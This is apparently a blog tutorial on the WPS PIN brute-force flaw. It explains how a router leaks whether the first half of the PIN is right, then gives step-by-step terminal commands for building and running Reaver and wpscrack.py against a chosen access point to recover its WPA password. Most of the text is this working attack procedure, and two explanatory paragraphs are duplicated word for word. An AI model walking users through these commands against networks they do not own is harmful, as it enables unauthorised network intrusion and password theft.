A flaw in WPS, or WiFi Protected Setup, known about for over a year by TNS, was finally exploited with proof of concept code. Both TNS, the discoverers of the exploit and Stefan at .braindump
have created their respective "reaver" and "wpscrack" programs to
exploit the WPS vulnerability. From this exploit, the WPA password can
be recovered almost instantly in plain-text once the attack on the
access point WPS is initiated, which normally takes 2-10 hours
(depending on which program you use).
This exploit defeats WPS via an intelligent brute force attack to the static WPS PIN. By guessing the PIN, the router will actually throw back, whether or not the first four digits (of eight) are correct. Then, the final number is a checking number used to satisfy an algorithm. This can be exploited to brute force the WPS PIN, and allow recovery of the WPA password in an incredibly short amount of time, as opposed to the standard attack on WPA.
let's go over how to use both tools to crack WPS. As of yet, no router is safe from this attack, and yet none of the vendors have reacted and released firmware with mitigations in place. Even disabling WPS still allows this attack on most routers.
Follow the guide that corresponds to the tool that you chose to use below.
This exploit defeats WPS via an intelligent brute force attack to the static WPS PIN. By guessing the PIN, the router will actually throw back, whether or not the first four digits (of eight) are correct. Then, the final number is a checking number used to satisfy an algorithm. This can be exploited to brute force the WPS PIN, and allow recovery of the WPA password in an incredibly short amount of time, as opposed to the standard attack on WPA.
let's go over how to use both tools to crack WPS. As of yet, no router is safe from this attack, and yet none of the vendors have reacted and released firmware with mitigations in place. Even disabling WPS still allows this attack on most routers.
Requirements
- Linux OS
- A router at home with WPS
- The following programs installed (install by package name): aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev
Tools
Crack WPS
Text in bold is a terminal command.Follow the guide that corresponds to the tool that you chose to use below.
Reaver
- Unzip Reaver.
- unzip reaver-1.3.tar.gz
- Change to the Reaver directory.
- cd reaver-1.3
- Configure, compile and install the application.
- ./configure && make && sudo make install
- Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX).
- sudo iwlist scan wlan0
- Set your device into monitor mode.
- sudo airmon-ng start wlan0
- Run the tool against an access point.
- reaver -i mon0 -b <MA:CA:DD:RE:SS:XX> -vv
- Wait until it finishes.
wpscrack.py
- Make the program an executable.
- chmod +x wpscrack.py
- Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX).
- sudo iwlist scan wlan0
- Get your MAC address, save it for later.
- ip link show wlan0 | awk '/ether/ {print $2}'
- Set your device into monitor mode.
- sudo airmon-ng start wlan0
- Attack your AP.
- wpscrack.py –iface mon0 –client <your MAC, because you're attacking yourself, right?> –bssid <AP MAC address> --ssid <name of your AP> -v
- Await victory.
